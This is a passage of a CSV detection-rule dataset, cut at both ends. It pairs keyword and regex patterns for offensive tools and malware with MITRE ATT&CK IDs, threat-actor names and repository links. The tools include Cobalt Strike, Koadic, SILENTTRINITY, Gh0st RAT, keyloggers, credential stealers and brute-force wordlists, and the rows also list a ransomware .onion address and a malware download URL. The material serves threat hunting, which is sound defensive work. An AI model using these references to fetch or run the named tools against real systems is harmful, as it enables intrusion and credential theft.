SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","62991" "*wmipersist.py*",".{0,1000}wmipersist\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62992" "*wmipersistence.py*",".{0,1000}wmipersistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","62993" "*WMIPersistence.vbs*",".{0,1000}WMIPersistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","62994" "*WMIPersistImplant*",".{0,1000}WMIPersistImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62995" "*WMI-ProcessCreate.cpp*",".{0,1000}WMI\-ProcessCreate\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - 
Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","62996" "*WMIReg.exe*",".{0,1000}WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62997" "*wmispawn select*",".{0,1000}wmispawn\sselect.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62998" 
"*WmiSploit.git*",".{0,1000}WmiSploit\.git.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","62999" "*WmiSploit-master/zip*",".{0,1000}WmiSploit\-master\/zip.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","63000" "*WNFarmDynamite_h.cs*",".{0,1000}WNFarmDynamite_h\.cs.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","63001" "*wolfexp.net/other/Gh0st_RAT/demo.rar*",".{0,1000}wolfexp\.net\/other\/Gh0st_RAT\/demo\.rar.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","63002" "*woqjumaahi662ka26jzxyx7fznbp4kg3bsjar4b52tqkxgm2pylcjlad.onion*",".{0,1000}woqjumaahi662ka26jzxyx7fznbp4kg3bsjar4b52tqkxgm2pylcjlad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63003" "*word_gen_b_varlen.*",".{0,1000}word_gen_b_varlen\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","63004" "*word_unc_injector.*",".{0,1000}word_unc_injector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63005" "*Wordlist/ftp_p.txt*",".{0,1000}Wordlist\/ftp_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63006" "*Wordlist/ftp_u.txt*",".{0,1000}Wordlist\/ftp_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63007" "*Wordlist/ftp_up.txt*",".{0,1000}Wordlist\/ftp_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63008" 
"*Wordlist/mssql_up.txt*",".{0,1000}Wordlist\/mssql_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63009" "*Wordlist/mysql_up.txt*",".{0,1000}Wordlist\/mysql_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63010" "*Wordlist/oracle_up.txt*",".{0,1000}Wordlist\/oracle_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63011" "*Wordlist/pass.txt*",".{0,1000}Wordlist\/pass\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63012" "*Wordlist/pop_p.txt*",".{0,1000}Wordlist\/pop_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63013" "*Wordlist/pop_u.txt*",".{0,1000}Wordlist\/pop_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63014" 
"*Wordlist/postgres_up.txt*",".{0,1000}Wordlist\/postgres_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63015" "*Wordlist/smtp_p.txt*",".{0,1000}Wordlist\/smtp_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63016" "*Wordlist/smtp_u.txt*",".{0,1000}Wordlist\/smtp_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63017" "*Wordlist/snmp.txt*",".{0,1000}Wordlist\/snmp\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63018" "*Wordlist/sql_p.txt*",".{0,1000}Wordlist\/sql_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63019" "*Wordlist/sql_u.txt*",".{0,1000}Wordlist\/sql_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63020" 
"*Wordlist/ssh_p.txt*",".{0,1000}Wordlist\/ssh_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63021" "*Wordlist/ssh_u.txt*",".{0,1000}Wordlist\/ssh_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63022" "*Wordlist/ssh_up.txt*",".{0,1000}Wordlist\/ssh_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63023" "*Wordlist/telnet_p.txt*",".{0,1000}Wordlist\/telnet_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63024" "*Wordlist/telnet_u.txt*",".{0,1000}Wordlist\/telnet_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63025" "*Wordlist/telnet_up.txt*",".{0,1000}Wordlist\/telnet_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63026" 
"*Wordlist/user.txt*",".{0,1000}Wordlist\/user\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63027" "*Wordlist/vnc_p.txt*",".{0,1000}Wordlist\/vnc_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63028" "*Wordlist/windows_u.txt*",".{0,1000}Wordlist\/windows_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63029" "*Wordlist/windows_up.txt*",".{0,1000}Wordlist\/windows_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","63030" "*wordlist_TLAs.txt*",".{0,1000}wordlist_TLAs\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","63031" "*--wordlist=*-passwords.txt*",".{0,1000}\-\-wordlist\=.{0,1000}\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","63032" "*wordlist-nthash-reversed*",".{0,1000}wordlist\-nthash\-reversed.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is designed to downgrade - convert - dissect and shuck authentication tokens based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","63033" "*wordlist-probable.txt*",".{0,1000}wordlist\-probable\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","63034" "*wordlists*all_in_one.7z*",".{0,1000}wordlists.{0,1000}all_in_one\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","63035" "*wordlists*rmg.txt*",".{0,1000}wordlists.{0,1000}rmg\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","63036" 
"*wordlists*rmiscout.txt*",".{0,1000}wordlists.{0,1000}rmiscout\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","63037" "*wordlists/dynamic-all.txt*",".{0,1000}wordlists\/dynamic\-all\.txt.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","63038" "*wordlists/fasttrack.txt*",".{0,1000}wordlists\/fasttrack\.txt.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. 
Faster than other existing solutions (including the main leader in the network brute force market).","T1110 - T1040 - T1496","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","N/A","4","385","57","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z","63039" "*wordlists/rockyou.txt'*",".{0,1000}wordlists\/rockyou\.txt\'.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","63040" "*wordlists/subdomains-5000.txt*",".{0,1000}wordlists\/subdomains\-5000\.txt.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","63041" "*wordlists/top1million.txt*",".{0,1000}wordlists\/top1million\.txt.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","63042" "*workingKeyLog has been pushed to key log file!*",".{0,1000}workingKeyLog\shas\sbeen\spushed\sto\skey\slog\sfile!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","63043" "*WorkNew19\KillAV\Release\KillAV.pdb*",".{0,1000}WorkNew19\\KillAV\\Release\\KillAV\.pdb.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for 
process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63044" "*WorldWind Stealer.zip*",".{0,1000}WorldWind\sStealer\.zip.{0,1000}","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","Malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","N/A","10","1","20","2","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z","63045" "*WorldWind-Stealer*",".{0,1000}WorldWind\-Stealer.{0,1000}","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","Malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","N/A","10","1","20","2","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z","63046" "*Wow, Dirty CoW reloaded!*",".{0,1000}Wow,\sDirty\sCoW\sreloaded!.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","63048" "*wpapcap2john.*",".{0,1000}wpapcap2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","63049" "*wp-exploitable-plugins.txt*",".{0,1000}wp\-exploitable\-plugins\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63050" "*wpscan --api-token *",".{0,1000}wpscan\s\-\-api\-token\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - 